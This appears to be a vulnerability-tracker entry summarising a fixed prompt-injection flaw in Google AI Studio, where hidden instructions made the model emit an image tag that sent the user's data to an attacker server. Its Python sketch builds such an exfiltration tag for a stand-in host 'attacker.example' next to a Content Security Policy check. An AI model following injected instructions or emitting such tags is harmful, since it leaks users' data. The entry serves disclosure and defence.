Google AI Studio: LLM-Powered Data Exfiltration Hits Again! Quickly Fixed.
Summary
A researcher discovered a security flaw in Google AI Studio where prompt injection (tricking an AI by hiding instructions in the content it processes) enabled data exfiltration (stealing data) through HTML image tags rendered by the system: injected instructions made the model emit an image tag pointing at an attacker-controlled server, with the victim's data embedded in the URL. The attack worked because Google AI Studio lacked a Content Security Policy (a security rule that restricts which origins a webpage may load resources from), so the browser fetched the image and delivered the data to the unauthorized server. Google fixed the issue quickly.
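The mechanism can be sketched in a few lines. The host name, stolen string, and helper functions below are hypothetical illustrations, not the researcher's actual payload or Google's actual fix; the `img_src_allowed` check is only a simplified model of how a browser enforces a CSP `img-src` allowlist.

```python
from urllib.parse import quote, urlparse

# Attack pattern: injected instructions make the model emit an HTML image
# tag whose URL carries the victim's data as a query string. When the UI
# renders the tag, the browser requests the URL and leaks the data.
def exfil_image_tag(attacker_host: str, stolen_data: str) -> str:
    return f'<img src="https://{attacker_host}/log?q={quote(stolen_data)}">'

# Mitigation sketch: an img-src allowlist as set by a Content-Security-Policy
# header. A browser enforcing it refuses to load images from other origins.
def img_src_allowed(policy_hosts: set[str], img_url: str) -> bool:
    return urlparse(img_url).hostname in policy_hosts

tag = exfil_image_tag("attacker.example", "user chat history")
url = tag.split('src="')[1].rstrip('">')

# With no CSP, any origin loads; with img-src restricted to trusted hosts,
# the request to the attacker's domain is blocked.
print(img_src_allowed({"ai.google.dev"}, url))  # False -> request blocked
```

This is why a missing CSP matters: the model only has to produce markup, and the browser does the actual network request on the attacker's behalf.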
Classification
Affected Vendors
Google
Related Issues
CVE-2025-45150: Insecure permissions in LangChain-ChatGLM-Webui commit ef829 allows attackers to arbitrarily view and download sensitive …
CVE-2025-54868: LibreChat is a ChatGPT clone with additional features. In versions 0.0.6 through 0.7.7-rc1, an exposed testing endpoint …
Original source: https://embracethered.com/blog/posts/2024/google-ai-studio-data-exfiltration-now-fixed/
First tracked: February 12, 2026 at 02:20 PM
Classified by LLM (prompt v3) · confidence: 85%